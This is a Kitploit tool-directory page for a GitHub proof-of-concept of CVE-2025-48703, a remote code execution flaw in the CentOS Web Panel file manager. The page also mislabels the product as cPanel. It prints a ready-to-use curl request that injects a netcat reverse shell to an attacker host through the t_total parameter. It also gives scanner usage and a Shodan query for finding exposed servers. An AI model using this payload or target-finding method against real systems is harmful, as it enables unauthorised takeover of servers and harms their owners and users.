Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/skynoxk/cve-2025-48703
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubskynoxk/cve-2025-48703

CVE-2025-48703

Remote Code execution in CentOS web panel

View Repository
3131 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

🛡️ CVE-2025-48703 - Remote Code Execution (RCE) in cPanel File Manager

📌 Description

CVE-2025-48703 is a Remote Code Execution (RCE) vulnerability in the filemanager module of a web hosting control panel (e.g., cPanel). It occurs due to unsanitized input handling in the acc=changePerm function, which allows an attacker to inject and execute arbitrary system commands using the t_total parameter.


🧨 Impact

This vulnerability allows attackers to:

  • Execute arbitrary commands on the target server.
  • Establish a reverse shell for persistent access.
  • Potentially escalate privileges or move laterally.

⚠️ This attack can be performed with minimal authentication, or in some configurations, unauthenticated access.


🚀 Proof-of-Concept (PoC)

✅ Reverse Shell Command

root@kitploit:~
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
  --data 'fileName=.bashrc&currentPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'
Download Tool

Scanner usage

root@kitploit:~
python3 Scanner.py  #Make sure targets.txt is in the same dir

Shodan search

root@kitploit:~
Server: cwpsrv

Reference: https://fenrisk.com/rce-centos-webpanel